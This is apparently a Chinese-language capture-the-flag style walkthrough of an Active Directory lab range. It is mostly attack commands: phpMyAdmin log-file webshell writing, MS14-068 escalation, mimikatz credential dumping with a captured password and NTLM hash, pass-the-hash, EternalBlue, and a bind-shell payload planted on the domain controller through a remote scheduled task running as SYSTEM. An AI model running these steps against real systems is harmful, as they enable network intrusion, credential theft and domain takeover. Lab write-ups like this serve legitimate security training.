靶機下載地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
攻擊拓撲如下
0x01環境搭建
配置兩卡,僅主機模式192.168.52.0網段模擬內網,192.168.72.0網段模擬外網
Kali linux IP 192.168.72.131
win7 IP 192.168.72.130/192.168.52.143
win2003 IP 192.168.72.141
DC 2008 IP 192.168.52.138
0X02信息收集
用nmap找到外網IP地址
netdiscover -i eth0 -r 192.168.72.0/24
御劍掃目錄掃到后台
掃到目錄http://192.168.72.130/phpmyadmin/
弱口令root /root進入后台
0x03phpmyadmin后台getshell
show variables like '%general%'; #查看日志狀態
SET GLOBAL general_log='on'
SET GLOBAL general_log_file='C:/phpStudy/www/233.php' 設置路徑
SELECT '' //寫入一句話木馬
getshell
http://192.168.72.130/233.php
0x04權限提升
直接用Cs的腳本ms14-068提權
0x05內網信息收集
把webshell轉換成cs上線
ipconfig /all
hashdump看一下密碼
再用mimikatz抓一下明文密碼,抓到hongrisec@2020
shell net user /domain
查看域內用戶
使用lodan掃描內網網絡
使用lazagone.exe 抓取本機所有密碼
抓到了很多win7機器上的密碼
用Msf的這個模塊可以判斷目標機器上面裝了那些軟件
run post/windows/gather/enum_applications 使用這個之后發現win7(雙網卡機器)上有一個現成的nmap
直接用beacon下的nmap去掃描DC的漏洞 shell nmap --script=vuln 192.168.52.138 發現域控存在ms17-010
這里其實已經可以直接去用Msf打域控的17010了
0x06MSF與CS聯動
新啟一個監聽,用foriereverse_tcp,然后msf開始監聽端口,成功轉接cs的shell
查看當前網段並添加路由
0x07配置msf代理
之前掃描的是DC,先看一下2003有沒有漏洞,掃一下141,其實不掛代理也行,win7里面有一個Nmap,這里要注意socks代理不支持icmp協議
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms17-010.nse 192.168.52.141
0x08兩種拿下2003
因為已經知道了漏洞,直接永恆之藍打過去了
PTH方法
選擇之前生成的那個smb beacon 然后在用哈希傳遞的方法,域內管理員的賬號直接登錄
192.168.52.141成功上線
0x09票據+計划任務拿DC
mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141
shell dir \192.168.52.138\c$ //dir DC的目錄
生成一個exe馬
這里用windows/reverse_bind_tcp LHOST=0.0.0.0 LPORT=7777 生成正向的馬 yukong.exe
把馬復制到域控機器上shell copy C:\yukong.exe \192.168.52.138\c$
然后再用這個寫入計划任務的方法去連接,這里馬反彈會連不成功,所以
shell schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2020"
掛着win7代理 proxy nc -vv 192.168.52.138 7777 即可彈回DC138的shell
用Meterpreter的馬也可以,之前失敗了,后續還是改成meterpreter的馬,或者把普通shell再升級成meterpreter再導入cs也可以
馬上線之后清除計划任務schtasks /delete /s 192.168.52.138 /tn "test" /f
本靶場有很多地方都可以打成功,可以自己嘗試一下。